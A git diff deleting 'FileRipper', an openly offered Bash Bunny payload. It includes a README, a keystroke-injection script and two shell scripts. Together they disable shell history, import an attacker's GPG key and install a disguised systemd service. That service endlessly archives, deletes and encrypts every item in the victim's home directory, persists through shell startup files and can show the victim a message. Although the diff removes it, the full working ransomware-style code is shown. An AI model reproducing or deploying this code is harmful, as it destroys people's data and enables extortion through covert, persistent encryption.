diff --git a/payloads/library/execution/FileRipper/README.md b/payloads/library/execution/FileRipper/README.md deleted file mode 100644 index c4694360..00000000 --- a/payloads/library/execution/FileRipper/README.md +++ /dev/null @@ -1,53 +0,0 @@ -## About: -* Title: FileRipper -* Description: FileRipper is a payload which encrypts users data. -* AUTHOR: drapl0n -* Version: 1.0 -* Category: Execution -* Target: Unix-like operating systems with systemd. -* Attackmodes: HID, Storage - -## FileRipper: FileRipper is a payload which encrypts users data using asymmetric cipher. - -### Features: -* Encrypts personal files and directories in home directory. -* Decryptable using private key. -* Persistent. -* Autostart payload on boot. - -### Workflow: -1. Stop storing history, this helps to keep tracks clear from begining. -2. Importing Public GPG key. -3. Creating non-root systemd service. -4. Deploying fileRipper. -5. Autostarting service on opening terminal with shell (bash and zsh). -6. Entering Message. - -### Directory Structure of payload components: -| FileName | Directory | -| -------------- | ----------------------------- | -| payload.txt | /payload/switch1/ | -| payload.sh | /payload/ | -| fileRipper | /tools/ | -| public.pub | /tools/ | - -### Changes to be made: -* Replace key name "alice" with your key name in payload.txt on line no ```50```. -* Replace key name "alice" with your key name in fileRipper on line no ```6```. -* Change message in payload.sh on line no ```14```. -* Remove line no ```14``` and ```15``` in payload.sh to disable displaying message. - -### Usage: -* #### Create new key pair: - ```gpg --full-gen-key --expert``` -* #### Dump public key of freshly created gpg key: - ```gpg --armor --export > public.pub``` - -### LED Status: -* `SETUP` : MAGENTA -* `ATTACK` : YELLOW -* `FINISH` : GREEN - -#### Support me if you like my work: -* https://twitter.com/drapl0n - diff --git a/payloads/library/execution/FileRipper/fileRipper b/payloads/library/execution/FileRipper/fileRipper deleted file mode 100644 index df475a3c..00000000 --- a/payloads/library/execution/FileRipper/fileRipper +++ /dev/null @@ -1,11 +0,0 @@ -#!/bin/sh -cd ~/ -encrypt(){ - dirFile=$(ls | head -n 1) - tar cf ~/.crypttt/$dirFile.tar.gz --exclude='.' --exclude='..' --exclude='.crypttt' --remove-files $dirFile - gpg -e -r alice -o ~/.crypttt/$dirFile.tar.gpg ~/.crypttt/$dirFile.tar.gz && rm -rf ~/.crypttt/$dirFile.tar.gz -} -for (( ; ; )) -do - encrypt -done diff --git a/payloads/library/execution/FileRipper/payload.sh b/payloads/library/execution/FileRipper/payload.sh deleted file mode 100644 index 8eace516..00000000 --- a/payloads/library/execution/FileRipper/payload.sh +++ /dev/null @@ -1,15 +0,0 @@ -#!/bin/bash -lol=$(lsblk | grep 1.8G) -disk=$(echo $lol | awk '{print $1}') -mntt=$(lsblk | grep $disk | awk '{print $7}') -cp -r $mntt/tools/public.pub /tmp -gpg --import /tmp/public.pub -rm /tmp/public.pub -mkdir ~/.crypttt -mkdir -p ~/.config/systemd/user -echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysCall -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service -mkdir /var/tmp/.system -cp -r $mntt/tools/fileRipper /var/tmp/.system/sysCall -chmod +x /var/tmp/.system/sysCall -echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.bashrc\nfi" > ~/tmmmp -chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp diff --git a/payloads/library/execution/FileRipper/payload.txt b/payloads/library/execution/FileRipper/payload.txt deleted file mode 100644 index c2ca2299..00000000 --- a/payloads/library/execution/FileRipper/payload.txt +++ /dev/null @@ -1,99 +0,0 @@ -# Title: FileRipper -# Description: FileRipper is a payload which encrypts users data. -# AUTHOR: drapl0n -# Version: 1.0 -# Category: Execution -# Target: Unix-like operating systems with systemd. -# Attackmodes: HID, Storage - -LED SETUP -ATTACKMODE STORAGE HID -GET SWITCH_POSITION -LED ATTACK -Q DELAY 1000 -Q CTRL-ALT t -Q DELAY 1000 - -# [Prevent storing history] -Q STRING unset HISTFILE -Q ENTER -Q DELAY 200 - -# [Fetching BashBunny's block device] -Q STRING lol='$(lsblk | grep 1.8G)' -Q ENTER -Q DELAY 100 -Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' -Q ENTER -Q DELAY 200 - -# [Mounting BashBunny] -Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp -Q ENTER -Q DELAY 2000 -Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' -Q ENTER -Q DELAY 500 - -# [executing payload script] -Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/ -Q ENTER -Q STRING chmod +x /tmp/payload.sh -Q ENTER -Q STRING /tmp/./payload.sh -Q ENTER -Q DELAY 2000 -Q STRING rm /tmp/payload.sh -Q ENTER -Q DELAY 500 -# REM replace 'alice' with name of your key -Q STRING gpg --edit-key alice -Q ENTER -Q DELAY 300 -Q STRING trust -Q ENTER -Q DELAY 200 -Q STRING 5 -Q ENTER -Q DELAY 190 -Q STRING y -Q ENTER -Q CTRL c -Q DELAY 200 -Q STRING gpg --check-trustdb -Q ENTER -Q STRING gpg --update-trustdb -Q ENTER -Q DELAY 300 -Q STRING systemctl --user enable --now libSystemIO.service -Q ENTER -Q DELAY 300 -Q STRING systemctl --user start libSystemIO.service -Q ENTER -Q DELAY 100 -Q DELAY 200 - -# REM [autostart on opening terminal] -Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.zshrc -Q ENTER -Q DELAY 200 -Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.bashrc -Q ENTER - -# REM [Message] -# REM Remove this block if you dont want to prompt message to victim. -# REM Change your message. -Q ENTER -Q DELAY 100 -Q STRING echo "echo Enter Your Message Here" >> ~/.bashrc -Q ENETR -Q STRING echo "echo Enter Your Message Here" >> ~/.zshrc -Q ENTER - -# [Unmounting BashBunny] -Q STRING udisksctl unmount -b /dev/'$disk' -Q ENTER -Q DELAY 500 -# Q STRING exit -Q ENTER -LED FINISH